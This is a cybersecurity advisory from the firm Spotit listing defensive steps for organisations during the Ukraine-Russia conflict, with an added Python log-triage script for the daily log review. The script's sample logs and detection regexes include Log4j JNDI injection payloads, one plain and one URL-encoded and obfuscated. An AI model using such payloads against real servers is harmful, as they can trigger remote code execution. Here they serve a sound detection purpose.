Which cybersecurity measures to take due to Ukraine Russia crisis
As a result of the escalated conflict between Ukraine and Russia, the risk of cyberattacks against Western organizations is elevated. In particular, organizations in critical infrastructure sectors providing essential services should be on high alert.
Over the past couple of weeks, Russian threat groups have already demonstrated their nation-state attack capabilities by targeting Ukrainian government and financial institutions.
National cybersecurity bodies around the world have issued guidance regarding the threats from Russia during this time. Guidance has come from CISA in the United States, the NCSC in the United Kingdom, and the CCB in Belgium. There is still no specific threat intelligence that attacks outside of Ukraine are underway; however, we must upgrade our posture to be safe.
Emergency Security Advice
Consult with your cybersecurity staff and partners on how to secure your assets quickly. You may be struggling with what to prioritize. The quick answer is: prioritize everything.
Spotit recommends the following guidance for all organizations:
Empower your Chief Information Security Officer (CISO) and their teams
Your CISO should be your top cybersecurity expert and as such, they need to be empowered to make executive decisions around your security policy. The CISO needs to:
- Enforce internal security policies
- Tighten domain blocking lists
- Prioritize and delegate the implementation of security controls
- Create and test an incident response plan
Mitigate visibility gaps
- Make sure that you have active monitoring on every single asset in every domain you control. The following five controls are the minimum an organization should have in place:
  - EDR/XDR on every endpoint
  - Email security
  - DNS monitoring and blocking
  - Firewall and IDS/IPS logs
  - Active Directory domain(s) security controls
- Ensure that all these logs are centrally collected and monitored for suspicious activity by your internal/external SOC.
- Review logs daily for unexpected behavior, including:
  - Outbound connections to unknown domains and IPs
  - New/uncategorized domains
  - TOR traffic
  - Log4j payloads
  - Guest Wi-Fi users
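As an added illustration (not part of the original advisory) of the daily log review described above, the Python script below applies three of the listed checks to constructed sample proxy log lines: outbound connections to hosts outside a known-domain allowlist, connections to addresses on a Tor exit list, and Log4j JNDI lookup payloads, including URL-encoded and `${lower:}`-obfuscated variants. The allowlist, the exit-node set, the log format and the log lines are all constructed placeholders; in production they would come from your proxy categorization service, the Tor Project exit list and your SIEM.

```python
import re
from urllib.parse import unquote

# Constructed allowlist and Tor exit set (placeholders, not real intelligence).
KNOWN_DOMAINS = {"www.example.com", "login.microsoftonline.com"}
TOR_EXIT_IPS = {"198.51.100.10"}

# Constructed log format: src_ip dst_ip dst_host "request"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"')
# Unwraps Log4j lookup obfuscation such as ${lower:j} or ${::-j} to the bare character.
_WRAP_RE = re.compile(r"\$\{(?:lower:|upper:|::-)([^${}])\}", re.I)
_JNDI_RE = re.compile(r"\$\{\s*jndi:", re.I)

def has_jndi_payload(text: str) -> bool:
    """True if the request contains a (possibly obfuscated or URL-encoded) Log4j JNDI lookup."""
    s = unquote(unquote(text))  # double-decode to catch %2524-style double encoding
    prev = None
    while prev != s:            # collapse nested wrappers until the string is stable
        prev, s = s, _WRAP_RE.sub(r"\1", s)
    return bool(_JNDI_RE.search(s))

def triage(log_lines):
    """Return (line_no, category, detail) findings for the daily review."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = LINE_RE.match(line)
        if not m:
            findings.append((n, "unparseable", line))
            continue
        src, dst_ip, host, request = m.groups()
        if has_jndi_payload(request):
            findings.append((n, "log4j_payload", request))
        if dst_ip in TOR_EXIT_IPS:
            findings.append((n, "tor_exit", dst_ip))
        if host == "-" or host not in KNOWN_DOMAINS:   # "-" means no hostname was logged
            findings.append((n, "unknown_domain", host))
    return findings

# Constructed sample lines, not real traffic.
SAMPLE_LOGS = [
    '10.1.2.3 93.184.216.34 www.example.com "GET /index.html HTTP/1.1"',
    '10.1.2.7 198.51.100.10 - "CONNECT 198.51.100.10:443 HTTP/1.1"',
    '10.1.2.9 203.0.113.77 cdn.updates.invalid "GET /a.bin HTTP/1.1"',
    '10.1.2.4 93.184.216.34 www.example.com "GET /?q=${jndi:ldap://203.0.113.5/x} HTTP/1.1"',
    '10.1.2.5 93.184.216.34 www.example.com "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2Fx%2Fy%7D HTTP/1.1"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOGS):
        print(finding)
```

The "unknown domain" check is intentionally noisy; in practice it is paired with a categorization feed so that only new or uncategorized destinations are raised for analyst review.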
Ideally, any asset in your organization that has a security update released by the vendor should be patched. This includes:
- All computers – Windows, Mac, Linux/Unix, Chromebooks etc.
- All smartphones and tablets
- Firewalls and network hardware
- IoT devices
- CCTV systems
- Access control, door systems
In reality, a lot of organizations struggle to effectively implement a patch management policy that covers everything in a timely fashion. This is where utilizing a vulnerability management solution is essential.
A good vulnerability management solution helps identify which patches should be installed first to reduce the most risk for the organization, allowing the IT team's available time to be managed efficiently.
Switch to short-term priorities
- Have your cyber contingency plan ready. Our recommendation is to develop, update and test your incident response plan.
- Any security upgrade that you had planned for later in the year: Do it now, even if that means overtime
- Deploy MFA everywhere (especially for remote access services) and consider switching to hardware-controlled MFA devices on admin accounts
- Restrict access to systems to only the staff who require it, including SharePoint and OneDrive/other cloud storage
- Delete old unnecessary/unused accounts, especially from staff that have left the business.
- Reduce the external attack surface by disabling unused or unessential ports
- Take backups of critical devices and information and store them offline. Ensure that the process to restore these backups is tested at regular intervals.
Would you like more information about how spotit can assist in resolving your security concerns? Do you need support in developing or challenging your incident response plan? Don't hesitate to contact us at [email protected]